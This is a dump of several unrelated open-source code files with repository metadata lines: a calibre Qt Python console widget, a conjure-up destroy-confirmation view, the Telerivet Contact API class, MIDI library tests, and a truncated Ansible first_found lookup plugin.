self.history = History([''], dynamic.get('console_history', []))
self.prompt_frame = None
self.allow_output = False
self.prompt_frame_format = QTextFrameFormat()
self.prompt_frame_format.setBorder(1)
self.prompt_frame_format.setBorderStyle(QTextFrameFormat.BorderStyle_Solid)
self.prompt_len = len(prompt)
self.doc.setMaximumBlockCount(int(prefs['scrollback']))
self.lexer = PythonLexer(ensurenl=False)
self.tb_lexer = PythonTracebackLexer()
self.context_menu = cm = QMenu(self) # {{{
cm.theme = ThemeMenu(cm)
# }}}
self.formatter = Formatter(prompt, continuation, style=prefs['theme'])
p = QPalette()
p.setColor(p.Base, QColor(self.formatter.background_color))
p.setColor(p.Text, QColor(self.formatter.color))
self.setPalette(p)
self.key_dispatcher = { # {{{
Qt.Key_Enter : self.enter_pressed,
Qt.Key_Return : self.enter_pressed,
Qt.Key_Up : self.up_pressed,
Qt.Key_Down : self.down_pressed,
Qt.Key_Home : self.home_pressed,
Qt.Key_End : self.end_pressed,
Qt.Key_Left : self.left_pressed,
Qt.Key_Right : self.right_pressed,
Qt.Key_Backspace : self.backspace_pressed,
Qt.Key_Delete : self.delete_pressed,
} # }}}
motd = textwrap.dedent('''\
# Python {0}
# {1} {2}
'''.format(sys.version.splitlines()[0], __appname__,
__version__))
sys.excepthook = self.unhandled_exception
self.controllers = []
QTimer.singleShot(0, self.launch_controller)
with EditBlock(self.cursor):
self.render_block(motd)
def shutdown(self):
dynamic.set('console_history', self.history.serialize())
self.shutting_down = True
for c in self.controllers:
c.kill()
def contextMenuEvent(self, event):
self.context_menu.popup(event.globalPos())
event.accept()
# Controller management {{{
@property
def controller(self):
return self.controllers[-1]
def no_controller_error(self):
error_dialog(self, _('No interpreter'),
_('No active interpreter found. Try restarting the'
' console'), show=True)
def launch_controller(self, *args):
c = Controller(self)
c.write_output.connect(self.show_output, type=Qt.QueuedConnection)
c.show_error.connect(self.show_error, type=Qt.QueuedConnection)
c.interpreter_died.connect(self.interpreter_died,
type=Qt.QueuedConnection)
c.interpreter_done.connect(self.execution_done)
self.controllers.append(c)
def interpreter_died(self, controller, returncode):
if not self.shutting_down and controller.current_command is not None:
error_dialog(self, _('Interpreter died'),
_('Interpreter dies while executing a command. To see '
'the command, click Show details'),
det_msg=controller.current_command, show=True)
def execute(self, prompt_lines):
c = self.root_frame.lastCursorPosition()
self.setTextCursor(c)
self.old_prompt_frame = self.prompt_frame
self.prompt_frame = None
self.old_buf = self.buf
self.buf = []
self.running.emit()
self.controller.runsource('\n'.join(prompt_lines))
def execution_done(self, controller, ret):
if controller is self.controller:
self.running_done.emit()
if ret: # Incomplete command
self.buf = self.old_buf
self.prompt_frame = self.old_prompt_frame
c = self.prompt_frame.lastCursorPosition()
c.insertBlock()
self.setTextCursor(c)
else: # Command completed
try:
self.old_prompt_frame.setFrameFormat(QTextFrameFormat())
except RuntimeError:
# Happens if enough lines of output that the old
# frame was deleted
pass
self.render_current_prompt()
# }}}
# Prompt management {{{
@dynamic_property
def cursor_pos(self):
doc = '''
The cursor position in the prompt has the form (row, col).
row starts at 0 for the first line
col is 0 if the cursor is at the start of the line, 1 if it is after
the first character, n if it is after the nth char.
'''
def fget(self):
if self.prompt_frame is not None:
pos = self.cursor.position()
it = self.prompt_frame.begin()
lineno = 0
while not it.atEnd():
bl = it.currentBlock()
if bl.contains(pos):
return (lineno, pos - bl.position())
it += 1
lineno += 1
return (-1, -1)
def fset(self, val):
row, col = val
if self.prompt_frame is not None:
it = self.prompt_frame.begin()
lineno = 0
while not it.atEnd():
if lineno == row:
c = self.cursor
c.setPosition(it.currentBlock().position())
c.movePosition(c.NextCharacter, n=col)
self.setTextCursor(c)
break
it += 1
lineno += 1
return property(fget=fget, fset=fset, doc=doc)
def move_cursor_to_prompt(self):
if self.prompt_frame is not None and self.cursor_pos[0] < 0:
c = self.prompt_frame.lastCursorPosition()
self.setTextCursor(c)
def prompt(self, strip_prompt_strings=True):
if not self.prompt_frame:
yield u'' if strip_prompt_strings else self.formatter.prompt
else:
it = self.prompt_frame.begin()
while not it.atEnd():
bl = it.currentBlock()
t = unicode(bl.text())
if strip_prompt_strings:
t = t[self.prompt_len:]
yield t
it += 1
def set_prompt(self, lines):
self.render_current_prompt(lines)
def clear_current_prompt(self):
if self.prompt_frame is None:
c = self.root_frame.lastCursorPosition()
self.prompt_frame = c.insertFrame(self.prompt_frame_format)
self.setTextCursor(c)
else:
c = self.prompt_frame.firstCursorPosition()
self.setTextCursor(c)
c.setPosition(self.prompt_frame.lastPosition(), c.KeepAnchor)
c.removeSelectedText()
c.setPosition(self.prompt_frame.firstPosition())
def render_current_prompt(self, lines=None, restore_cursor=False):
row, col = self.cursor_pos
cp = list(self.prompt()) if lines is None else lines
self.clear_current_prompt()
for i, line in enumerate(cp):
start = i == 0
end = i == len(cp) - 1
self.formatter.render_prompt(not start, self.cursor)
self.formatter.render(self.lexer.get_tokens(line), self.cursor)
if not end:
self.cursor.insertBlock()
if row > -1 and restore_cursor:
self.cursor_pos = (row, col)
self.ensureCursorVisible()
# }}}
# Non-prompt Rendering {{{
def render_block(self, text, restore_prompt=True):
self.formatter.render(self.lexer.get_tokens(text), self.cursor)
self.cursor.insertBlock()
self.cursor.movePosition(self.cursor.End)
if restore_prompt:
self.render_current_prompt()
def show_error(self, is_syntax_err, tb, controller=None):
if self.prompt_frame is not None:
# At a prompt, so redirect output
return prints(tb, end='')
try:
self.buf.append(tb)
if is_syntax_err:
self.formatter.render_syntax_error(tb, self.cursor)
else:
self.formatter.render(self.tb_lexer.get_tokens(tb), self.cursor)
except:
prints(tb, end='')
self.ensureCursorVisible()
QApplication.processEvents()
def show_output(self, raw, which='stdout', controller=None):
def do_show():
try:
self.buf.append(raw)
self.formatter.render_raw(raw, self.cursor)
except:
import traceback
prints(traceback.format_exc())
prints(raw, end='')
if self.prompt_frame is not None:
with Prepender(self):
do_show()
else:
do_show()
self.ensureCursorVisible()
QApplication.processEvents()
# }}}
# Keyboard management {{{
def keyPressEvent(self, ev):
text = unicode(ev.text())
key = ev.key()
action = self.key_dispatcher.get(key, None)
if callable(action):
action()
elif key in (Qt.Key_Escape,):
QTextEdit.keyPressEvent(self, ev)
elif text:
self.text_typed(text)
else:
QTextEdit.keyPressEvent(self, ev)
def left_pressed(self):
lineno, pos = self.cursor_pos
if lineno < 0: return
if pos > self.prompt_len:
c = self.cursor
c.movePosition(c.PreviousCharacter)
self.setTextCursor(c)
elif lineno > 0:
c = self.cursor
c.movePosition(c.Up)
c.movePosition(c.EndOfLine)
self.setTextCursor(c)
self.ensureCursorVisible()
def up_pressed(self):
lineno, pos = self.cursor_pos
if lineno < 0: return
if lineno == 0:
b = self.history.back()
if b is not None:
self.set_prompt(b)
else:
c = self.cursor
c.movePosition(c.Up)
self.setTextCursor(c)
self.ensureCursorVisible()
def backspace_pressed(self):
lineno, pos = self.cursor_pos
if lineno < 0: return
if pos > self.prompt_len:
self.cursor.deletePreviousChar()
elif lineno > 0:
c = self.cursor
c.movePosition(c.Up)
c.movePosition(c.EndOfLine)
self.setTextCursor(c)
self.ensureCursorVisible()
def delete_pressed(self):
self.cursor.deleteChar()
self.ensureCursorVisible()
def right_pressed(self):
lineno, pos = self.cursor_pos
if lineno < 0: return
c = self.cursor
cp = list(self.prompt(False))
if pos < len(cp[lineno]):
c.movePosition(c.NextCharacter)
elif lineno < len(cp)-1:
c.movePosition(c.NextCharacter, n=1+self.prompt_len)
self.setTextCursor(c)
self.ensureCursorVisible()
def down_pressed(self):
lineno, pos = self.cursor_pos
if lineno < 0: return
c = self.cursor
cp = list(self.prompt(False))
if lineno >= len(cp) - 1:
b = self.history.forward()
if b is not None:
self.set_prompt(b)
else:
c = self.cursor
c.movePosition(c.Down)
self.setTextCursor(c)
self.ensureCursorVisible()
def home_pressed(self):
if self.prompt_frame is not None:
mods = QApplication.keyboardModifiers()
ctrl = bool(int(mods & Qt.CTRL))
if ctrl:
self.cursor_pos = (0, self.prompt_len)
else:
c = self.cursor
c.movePosition(c.StartOfLine)
c.movePosition(c.NextCharacter, n=self.prompt_len)
self.setTextCursor(c)
self.ensureCursorVisible()
def end_pressed(self):
if self.prompt_frame is not None:
mods = QApplication.keyboardModifiers()
ctrl = bool(int(mods & Qt.CTRL))
if ctrl:
self.cursor_pos = (len(list(self.prompt()))-1, self.prompt_len)
c = self.cursor
c.movePosition(c.EndOfLine)
self.setTextCursor(c)
self.ensureCursorVisible()
def enter_pressed(self):
if self.prompt_frame is None:
return
if not self.controller.is_alive:
return self.no_controller_error()
cp = list(self.prompt())
if cp[0]:
try:
ret = self.compiler('\n'.join(cp))
except:
pass
else:
if ret is None:
c = self.prompt_frame.lastCursorPosition()
c.insertBlock()
self.setTextCursor(c)
self.render_current_prompt()
return
else:
self.history.enter(cp)
self.execute(cp)
def text_typed(self, text):
if self.prompt_frame is not None:
self.move_cursor_to_prompt()
self.cursor.insertText(text)
self.render_current_prompt(restore_cursor=True)
self.history.current = list(self.prompt())
# }}}
| gpl-3.0 | -6,390,470,925,879,596,000 | 31.591522 | 83 | 0.54969 | false |
Ubuntu-Solutions-Engineering/conjure | conjureup/ui/views/destroy_confirm.py | 3 | 3999 | import datetime
from ubuntui.utils import Color, Padding
from ubuntui.widgets.buttons import menu_btn
from ubuntui.widgets.hr import HR
from ubuntui.widgets.text import Instruction
from urwid import Columns, Filler, Frame, Pile, Text, WidgetWrap
class DestroyConfirmView(WidgetWrap):
def __init__(self, app, controller, model, cb):
self.app = app
self.cb = cb
self.controller = controller
self.model = model
self.config = self.app.config
self.buttons_pile_selected = False
self.frame = Frame(body=self._build_widget(),
footer=self._build_footer())
self.frame.focus_position = 'footer'
self.buttons.focus_position = 1
super().__init__(self.frame)
def keypress(self, size, key):
if key in ['tab', 'shift tab']:
self._swap_focus()
return super().keypress(size, key)
def _swap_focus(self):
if not self.buttons_pile_selected:
self.buttons_pile_selected = True
self.frame.focus_position = 'footer'
self.buttons.focus_position = 1
else:
self.buttons_pile_selected = False
self.frame.focus_position = 'body'
def _build_footer(self):
no = menu_btn(on_press=self.cancel,
label="\n NO\n")
yes = menu_btn(on_press=self.submit,
label="\n YES\n")
self.buttons = Columns([
('fixed', 2, Text("")),
('fixed', 11, Color.menu_button(
no,
focus_map='button_primary focus')),
Text(""),
('fixed', 11, Color.menu_button(
yes,
focus_map='button_primary focus')),
('fixed', 2, Text(""))
])
self.footer = Pile([
Padding.line_break(""),
self.buttons
])
return Color.frame_footer(self.footer)
def _sanitize_date(self, date_obj):
""" Some cases juju uses human readable date/time like X secs ago and models
that run longer get a typical datetime.date object, need to make sure
of which one we're dealing with
Arguments:
date_obj: datetime.date object
Returns:
String representation of date or the Juju human readable string
if applicable
"""
if isinstance(date_obj, datetime.date):
return date_obj.strftime('%Y-%m-%d')
else:
return str(date_obj)
def _total_machines(self, model):
""" Returns total machines in model
"""
machines = model.get('machines', None)
if machines is None:
return 0
return len(machines.keys())
def _build_widget(self):
applications = self.app.juju.client.applications
total_items = [Instruction("Deployment Information:"), HR()]
tbl = Pile([
Columns([('fixed', 15, Text("Name")),
Text(self.model['name'])]),
Columns([('fixed', 15, Text("Cloud")),
Text(self.model['cloud'])]),
Columns([('fixed', 15, Text("Status")),
Text(self.model['status']['current'])]),
Columns([('fixed', 15, Text("Online")),
Text(self._sanitize_date(
self.model['status']['since']))]),
Columns([('fixed', 15, Text("Applications")),
Text(", ".join(applications.keys()))]),
Columns([('fixed', 15, Text("Machines")),
Text(str(self._total_machines(self.model)))])
])
total_items.append(tbl)
total_items.append(HR())
return Padding.center_80(Filler(Pile(total_items), valign='top'))
def submit(self, btn):
self.footer.contents[-1] = (Text(""), self.footer.options())
self.cb(self.controller, self.model['name'])
def cancel(self, btn):
self.cb(None, None)
| mit | 565,828,565,105,347,700 | 33.179487 | 84 | 0.540635 | false |
Telerivet/telerivet-python-client | telerivet/contact.py | 1 | 12556 | from .entity import Entity
class Contact(Entity):
"""
Fields:
- id (string, max 34 characters)
* ID of the contact
* Read-only
- name
* Name of the contact
* Updatable via API
- phone_number (string)
* Phone number of the contact
* Updatable via API
- time_created (UNIX timestamp)
* Time the contact was added in Telerivet
* Read-only
- time_updated (UNIX timestamp)
* Time the contact was last updated in Telerivet
* Read-only
- send_blocked (bool)
* True if Telerivet is blocked from sending messages to this contact
* Updatable via API
- conversation_status
* Current status of the conversation with this contact
* Allowed values: closed, active, handled
* Updatable via API
- last_message_time (UNIX timestamp)
* Last time the contact sent or received a message (null if no messages have been sent
or received)
* Read-only
- last_incoming_message_time (UNIX timestamp)
* Last time a message was received from this contact
* Read-only
- last_outgoing_message_time (UNIX timestamp)
* Last time a message was sent to this contact
* Read-only
- message_count (int)
* Total number of non-deleted messages sent to or received from this contact
* Read-only
- incoming_message_count (int)
* Number of messages received from this contact
* Read-only
- outgoing_message_count (int)
* Number of messages sent to this contact
* Read-only
- last_message_id
* ID of the last message sent to or received from this contact (null if no messages
have been sent or received)
* Read-only
- default_route_id
* ID of the phone or route that Telerivet will use by default to send messages to this
contact (null if using project default route)
* Updatable via API
- group_ids (array of strings)
* List of IDs of groups that this contact belongs to
* Read-only
- vars (dict)
* Custom variables stored for this contact
* Updatable via API
- project_id
* ID of the project this contact belongs to
* Read-only
"""
def isInGroup(self, group):
"""
Returns true if this contact is in a particular group, false otherwise.
Arguments:
- group (Group)
* Required
Returns:
bool
"""
self.load()
return group.id in self._group_ids_set
def addToGroup(self, group):
"""
Adds this contact to a group.
Arguments:
- group (Group)
* Required
"""
self._api.doRequest("PUT", group.getBaseApiPath() + "/contacts/" + self.id);
self._group_ids_set[group.id] = True
def removeFromGroup(self, group):
"""
Removes this contact from a group.
Arguments:
- group (Group)
* Required
"""
self._api.doRequest("DELETE", group.getBaseApiPath() + "/contacts/" + self.id)
if group.id in self._group_ids_set:
del self._group_ids_set[group.id]
def queryMessages(self, **options):
"""
Queries messages sent or received by this contact.
Arguments:
- direction
* Filter messages by direction
* Allowed values: incoming, outgoing
- message_type
* Filter messages by message_type
* Allowed values: sms, mms, ussd, call, service
- source
* Filter messages by source
* Allowed values: phone, provider, web, api, service, webhook, scheduled,
integration
- starred (bool)
* Filter messages by starred/unstarred
- status
* Filter messages by status
* Allowed values: ignored, processing, received, sent, queued, failed,
failed_queued, cancelled, delivered, not_delivered
- time_created[min] (UNIX timestamp)
* Filter messages created on or after a particular time
- time_created[max] (UNIX timestamp)
* Filter messages created before a particular time
- external_id
* Filter messages by ID from an external provider
- contact_id
* ID of the contact who sent/received the message
- phone_id
* ID of the phone (basic route) that sent/received the message
- broadcast_id
* ID of the broadcast containing the message
- scheduled_id
* ID of the scheduled message that created this message
- sort
* Sort the results based on a field
* Allowed values: default
* Default: default
- sort_dir
* Sort the results in ascending or descending order
* Allowed values: asc, desc
* Default: asc
- page_size (int)
* Number of results returned per page (max 500)
* Default: 50
- offset (int)
* Number of items to skip from beginning of result set
* Default: 0
Returns:
APICursor (of Message)
"""
from .message import Message
return self._api.newApiCursor(Message, self.getBaseApiPath() + "/messages", options)
def queryGroups(self, **options):
"""
Queries groups for which this contact is a member.
Arguments:
- name
* Filter groups by name
* Allowed modifiers: name[ne], name[prefix], name[not_prefix], name[gte], name[gt],
name[lt], name[lte]
- dynamic (bool)
* Filter groups by dynamic/non-dynamic
- sort
* Sort the results based on a field
* Allowed values: default, name
* Default: default
- sort_dir
* Sort the results in ascending or descending order
* Allowed values: asc, desc
* Default: asc
- page_size (int)
* Number of results returned per page (max 500)
* Default: 50
- offset (int)
* Number of items to skip from beginning of result set
* Default: 0
Returns:
APICursor (of Group)
"""
from .group import Group
return self._api.newApiCursor(Group, self.getBaseApiPath() + "/groups", options)
def queryScheduledMessages(self, **options):
"""
Queries messages scheduled to this contact (not including messages scheduled to groups that
this contact is a member of)
Arguments:
- message_type
* Filter scheduled messages by message_type
* Allowed values: sms, mms, ussd, call, service
- time_created (UNIX timestamp)
* Filter scheduled messages by time_created
* Allowed modifiers: time_created[ne], time_created[min], time_created[max]
- next_time (UNIX timestamp)
* Filter scheduled messages by next_time
* Allowed modifiers: next_time[ne], next_time[min], next_time[max],
next_time[exists]
- sort
* Sort the results based on a field
* Allowed values: default, name
* Default: default
- sort_dir
* Sort the results in ascending or descending order
* Allowed values: asc, desc
* Default: asc
- page_size (int)
* Number of results returned per page (max 500)
* Default: 50
- offset (int)
* Number of items to skip from beginning of result set
* Default: 0
Returns:
APICursor (of ScheduledMessage)
"""
from .scheduledmessage import ScheduledMessage
return self._api.newApiCursor(ScheduledMessage, self.getBaseApiPath() + "/scheduled", options)
def queryDataRows(self, **options):
"""
Queries data rows associated with this contact (in any data table).
Arguments:
- time_created (UNIX timestamp)
* Filter data rows by the time they were created
* Allowed modifiers: time_created[ne], time_created[min], time_created[max]
- sort
* Sort the results based on a field
* Allowed values: default
* Default: default
- sort_dir
* Sort the results in ascending or descending order
* Allowed values: asc, desc
* Default: asc
- page_size (int)
* Number of results returned per page (max 500)
* Default: 50
- offset (int)
* Number of items to skip from beginning of result set
* Default: 0
Returns:
APICursor (of DataRow)
"""
from .datarow import DataRow
return self._api.newApiCursor(DataRow, self.getBaseApiPath() + "/rows", options)
def queryServiceStates(self, **options):
"""
Queries this contact's current states for any service
Arguments:
- id
* Filter states by id
* Allowed modifiers: id[ne], id[prefix], id[not_prefix], id[gte], id[gt], id[lt],
id[lte]
- vars (dict)
* Filter states by value of a custom variable (e.g. vars[email], vars[foo], etc.)
* Allowed modifiers: vars[foo][ne], vars[foo][prefix], vars[foo][not_prefix],
vars[foo][gte], vars[foo][gt], vars[foo][lt], vars[foo][lte], vars[foo][min],
vars[foo][max], vars[foo][exists]
- sort
* Sort the results based on a field
* Allowed values: default
* Default: default
- sort_dir
* Sort the results in ascending or descending order
* Allowed values: asc, desc
* Default: asc
- page_size (int)
* Number of results returned per page (max 500)
* Default: 50
- offset (int)
* Number of items to skip from beginning of result set
* Default: 0
Returns:
APICursor (of ContactServiceState)
"""
from .contactservicestate import ContactServiceState
return self._api.newApiCursor(ContactServiceState, self.getBaseApiPath() + "/states", options)
def save(self):
"""
Saves any fields or custom variables that have changed for this contact.
"""
super(Contact, self).save()
def delete(self):
"""
Deletes this contact.
"""
self._api.doRequest("DELETE", self.getBaseApiPath())
def getBaseApiPath(self):
return "/projects/%(project_id)s/contacts/%(id)s" % {'project_id': self.project_id, 'id': self.id}
def _setData(self, data):
super(Contact, self)._setData(data)
self._group_ids_set = {}
if 'group_ids' in data:
for group_id in data['group_ids']:
self._group_ids_set[group_id] = True
| mit | -4,420,296,154,701,561,000 | 32.662198 | 107 | 0.505575 | false |
jameswenzel/mydy | tests/test.py | 1 | 9590 | '''
Tests for MIDI modules
'''
import unittest
import random
import math
from itertools import chain
# in the dev environment, mydy is known as src
import src as mydy
# from mydy import Util, FileIO, Events
# from mydy.Constants import MAX_TICK_RESOLUTION
Util = mydy.Util
FileIO = mydy.FileIO
Events = mydy.Events
Containers = mydy.Containers
MAX_TICK_RESOLUTION = mydy.Constants.MAX_TICK_RESOLUTION
class TestUtil(unittest.TestCase):
def test_symmetry(self):
for _ in range(1000):
test = random.randint(2 ** 16, 2 ** (64) - 1)
self.assertEqual(test, Util.read_varlen(
iter(Util.write_varlen(test))))
class TestFileIO(unittest.TestCase):
def test_write_read(self):
'''Test that write and read are inverses of each other'''
read = FileIO.read_midifile('mary.mid')
self.assertTrue(len(read[0]) > 0)
FileIO.write_midifile('test.mid', read)
self.assertEqual(read, FileIO.read_midifile('test.mid'))
read2 = read * (2 / 3)
FileIO.write_midifile('test.mid', read2)
class TestEvents(unittest.TestCase):
def test_constructors(self):
'''Test all constructors behave as expected'''
for _, cls in chain(Events.EventRegistry.Events.items(),
Events.EventRegistry.MetaEvents.items()):
cls(metacommand=1, tick=1, data=[1])
def test_add_event(self):
'''Test that events support integer addition'''
pattern = FileIO.read_midifile('mary.mid')
event = pattern[1][5]
event2 = event + 1
self.assertNotEqual(event, event2)
self.assertEqual(event.pitch + 1, event2.pitch)
event3 = event2 - 1
self.assertEqual(event, event3)
def test_shift_event(self):
'''Test that events support integer shift operations'''
pattern = FileIO.read_midifile('mary.mid')
event = pattern[1][5]
event2 = event >> 1
self.assertNotEqual(event, event2)
self.assertEqual(event.velocity + 1, event2.velocity)
event3 = event2 << 1
self.assertEqual(event, event3)
def test_mul_event(self):
'''Test that events support integer and float multiplication'''
pattern = FileIO.read_midifile('mary.mid')
event = pattern[1][20]
event * 1 # test ints are valid too
event2 = event * 2.2
self.assertNotEqual(event, event2)
self.assertEqual(event.tick * 2.2, event2.tick)
event3 = event2 / 2.2
self.assertAlmostEqual(event.tick, event3.tick)
class TestTracks(unittest.TestCase):
def test_add_track(self):
'''Test that tracks support integer addition'''
pattern = FileIO.read_midifile('mary.mid')
track1 = pattern[1]
track2 = track1 + 1
self.assertNotEqual(track1, track2)
track3 = track2 - 1
self.assertEqual(track1, track3)
def test_shift_track(self):
'''Test that tracks support integer shift operations'''
pattern = FileIO.read_midifile('mary.mid')
track1 = pattern[1]
track2 = track1 >> 1
self.assertNotEqual(track1, track2)
track3 = track2 << 1
self.assertEqual(track1, track3)
def test_mul_track(self):
'''Test that tracks support integer and float multiplication'''
pattern = FileIO.read_midifile('mary.mid')
track1 = pattern[1]
track1 * 1 # test ints are valid too
track2 = track1 * 2.2
self.assertNotEqual(track1, track2)
track3 = track2 / 2.2
# avoid failures due to float imprecision
for event in track3:
event.tick = int(event.tick)
self.assertAlmostEqual(track1, track3)
def test_pow_tracks(self):
'''Tracks support integer and float power operations'''
pattern = FileIO.read_midifile('sotw.mid')
track = pattern[0]
self.assertTrue(track.length * 2 == (track ** 2).length)
track42 = track ** 4.2
self.assertTrue(track.length * 4.2 == (track ** 4.2).length)
self.assertTrue(int(track.length * 4.2) == int((track ** 4.2).length))
def test_add_tracks(self):
'''Tracks can be added together to create a new object'''
pattern = FileIO.read_midifile('mary.mid')
track1 = pattern[1]
copy = track1.copy()
self.assertTrue(len(track1) * 2 - 1 == len(track1 + track1))
combined = track1 + copy
self.assertTrue(track1[1] == combined[1] and
track1[1] is not combined[1])
def test_length_and_relative(self):
'''Length property works with both relative and absolute ticks.'''
pattern = FileIO.read_midifile('mary.mid')
self.assertEqual(pattern[0].length, 1)
running_tick = 0
for event in pattern[1]:
running_tick += event.tick
self.assertEqual(running_tick, pattern[1].length)
abscopy = pattern[1].copy()
abscopy.relative = False
# print(abscopy)
self.assertEqual(running_tick, abscopy.length)
def test_relative(self):
'''Test that relative setter and make_ticks_xxx methods work as expected,
ie methods return copies and setter modifies in place '''
pattern = FileIO.read_midifile('mary.mid')
track = pattern[1]
abscopy = track.copy()
abscopy2 = abscopy.make_ticks_abs()
self.assertTrue(abscopy is not abscopy2)
self.assertNotEqual(abscopy, abscopy2)
abscopy.relative = False
self.assertEqual(abscopy, abscopy2)
relcopy = abscopy.make_ticks_rel()
self.assertEqual(track, relcopy)
def test_merge(self):
pattern = FileIO.read_midifile('mary.mid')
track = pattern[1]
# TODO: nudge/shift operator/method?
def shift_100(event):
event = event.copy()
event.tick += 100
return event
shifted = track.copy()
shifted[0].tick += 100
merged = track.merge(shifted)
self.assertTrue(track.merge(shifted).length == track.length + 100)
def test_map_attr(self):
# Map supports optional attr; attrs that are Event-specific
pattern = FileIO.read_midifile('mary.mid')
track = pattern[1]
track = track.map(lambda e: 0, 'tick')
self.assertEqual(track.length, 0)
def change_tick(event):
event.tick = 0
return event
track = pattern[1].map(change_tick)
self.assertEqual(track.length, 0)
# not every event has a velocity attr
track = pattern[1].map(lambda e: 127, 'velocity')
self.assertEqual(track[5].velocity, 127)
track = pattern[1].make_ticks_abs().map(lambda e: e.tick ** 2, 'tick')
self.assertEqual(pattern[1].length ** 2, track.length)
def test_map_event_type(self):
pattern = FileIO.read_midifile('mary.mid')
track = pattern[1]
print(track)
track = track.map(lambda e: 69, 'tick', Events.ControlChangeEvent)
self.assertEqual(track[0].tick, 69)
def change_tick(event):
event.tick = 0
return event
track = pattern[1].map(change_tick)
self.assertEqual(track.length, 0)
track = pattern[1].map(change_tick, event_type=Events.NoteOnEvent)
self.assertEqual(track.length, 1)
class TestPattern(unittest.TestCase):
def test_deep_eq(self):
'''Test that two pattern objects equal each other'''
read1 = FileIO.read_midifile('mary.mid')
read2 = FileIO.read_midifile('mary.mid')
self.assertEqual(read1, read2)
def test_add_pattern(self):
pattern1 = FileIO.read_midifile('mary.mid')
pattern2 = pattern1 + 1
self.assertNotEqual(pattern1, pattern2)
pattern3 = pattern2 - 1
self.assertEqual(pattern1, pattern3)
def test_shift_pattern(self):
pattern1 = FileIO.read_midifile('mary.mid')
pattern2 = pattern1 >> 1
self.assertNotEqual(pattern1, pattern2)
pattern3 = pattern2 << 1
self.assertEqual(pattern1, pattern3)
pattern1 >> 200
math.ceil
def test_mul_pattern(self):
pattern1 = FileIO.read_midifile('mary.mid')
pattern1 * 1 # test ints are valid too
pattern2 = pattern1 * 2.2
self.assertNotEqual(pattern1, pattern2)
pattern3 = pattern2 / 2.2
# avoid failures due to float imprecision
for track in pattern3:
for event in track:
event.tick = int(event.tick)
self.assertEqual(pattern1, pattern3)
def test_mul_symmetry(self):
orig = FileIO.read_midifile('mary.mid')
orig *= 1.1
FileIO.write_midifile('test.mid', orig)
orig.resolution = MAX_TICK_RESOLUTION
for track in orig:
for event in track:
event.tick = int(event.tick + .5)
read = FileIO.read_midifile('test.mid')
self.assertEqual(orig, read)
def test_add_patterns(self):
pattern = FileIO.read_midifile('mary.mid')
copy = pattern.copy()
self.assertTrue(len(pattern) * 2 == len(pattern + copy))
self.assertTrue(pattern == copy and pattern is not copy)
for track, trackcopy in zip(pattern, copy):
self.assertEqual(track, trackcopy)
self.assertFalse(track is trackcopy)
for event, eventcopy in zip(track, trackcopy):
self.assertEqual(event, eventcopy)
self.assertFalse(event is eventcopy)
| mit | 1,308,363,646,772,172,000 | 35.325758 | 81 | 0.611679 | false |
hlieberman/debian-ansible | lib/ansible/runner/lookup_plugins/first_found.py | 33 | 5953 | # (c) 2013, seth vidal <[email protected]> red hat, inc
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# take a list of files and (optionally) a list of paths
# return the first existing file found in the paths
# [file1, file2, file3], [path1, path2, path3]
# search order is:
# path1/file1
# path1/file2
# path1/file3
# path2/file1
# path2/file2
# path2/file3
# path3/file1
# path3/file2
# path3/file3
# first file found with os.path.exists() is returned
# no file matches raises ansibleerror
# EXAMPLES
# - name: copy first existing file found to /some/file
# action: copy src=$item dest=/some/file
# with_first_found:
# - files: foo ${inventory_hostname} bar
# paths: /tmp/production /tmp/staging
# that will look for files in this order:
# /tmp/production/foo
# ${inventory_hostname}
# bar
# /tmp/staging/foo
# ${inventory_hostname}
# bar
# - name: copy first existing file found to /some/file
# action: copy src=$item dest=/some/file
# with_first_found:
# - files: /some/place/foo ${inventory_hostname} /some/place/else
# that will look for files in this order:
# /some/place/foo
# $relative_path/${inventory_hostname}
# /some/place/else
# example - including tasks:
# tasks:
# - include: $item
# with_first_found:
# - files: generic
# paths: tasks/staging tasks/production
# this will include the tasks in the file generic where it is found first (staging or production)
# example simple file lists
#tasks:
#- name: first found file
# action: copy src=$item dest=/etc/file.cfg
# with_first_found:
# - files: foo.${inventory_hostname} foo
# example skipping if no matched files
# First_found also offers the ability to control whether or not failing
# to find a file returns an error or not
#
#- name: first found file - or skip
# action: copy src=$item dest=/etc/file.cfg
# with_first_found:
# - files: foo.${inventory_hostname}
# skip: true
# example a role with default configuration and configuration per host
# you can set multiple terms with their own files and paths to look through.
# consider a role that sets some configuration per host falling back on a default config.
#
#- name: some configuration template
# template: src={{ item }} dest=/etc/file.cfg mode=0444 owner=root group=root
# with_first_found:
# - files:
# - ${inventory_hostname}/etc/file.cfg
# paths:
# - ../../../templates.overwrites
# - ../../../templates
# - files:
# - etc/file.cfg
# paths:
# - templates
# the above will return an empty list if the files cannot be found at all
# if skip is unspecificed or if it is set to false then it will return a list
# error which can be caught bye ignore_errors: true for that action.
# finally - if you want you can use it, in place to replace first_available_file:
# you simply cannot use the - files, path or skip options. simply replace
# first_available_file with with_first_found and leave the file listing in place
#
#
# - name: with_first_found like first_available_file
# action: copy src=$item dest=/tmp/faftest
# with_first_found:
# - ../files/foo
# - ../files/bar
# - ../files/baz
# ignore_errors: true
from ansible import utils, errors
import os
class LookupModule(object):
def __init__(self, basedir=None, **kwargs):
self.basedir = basedir
def run(self, terms, inject=None, **kwargs):
terms = utils.listify_lookup_plugin_terms(terms, self.basedir, inject)
result = None
anydict = False
skip = False
for term in terms:
if isinstance(term, dict):
anydict = True
total_search = []
if anydict:
for term in terms:
if isinstance(term, dict):
files = term.get('files', [])
paths = term.get('paths', [])
skip = utils.boolean(term.get('skip', False))
filelist = files
if isinstance(files, basestring):
files = files.replace(',', ' ')
files = files.replace(';', ' ')
filelist = files.split(' ')
pathlist = paths
if paths:
if isinstance(paths, basestring):
paths = paths.replace(',', ' ')
paths = paths.replace(':', ' ')
paths = paths.replace(';', ' ')
pathlist = paths.split(' ')
if not pathlist:
total_search = filelist
else:
for path in pathlist:
for fn in filelist:
f = os.path.join(path, fn)
total_search.append(f)
else:
total_search.append(term)
else:
total_search = terms
result = None
for fn in total_search:
path = utils.path_dwim(self.basedir, fn)
if os.path.exists(path):
return [path]
if not result:
if skip:
return []
else:
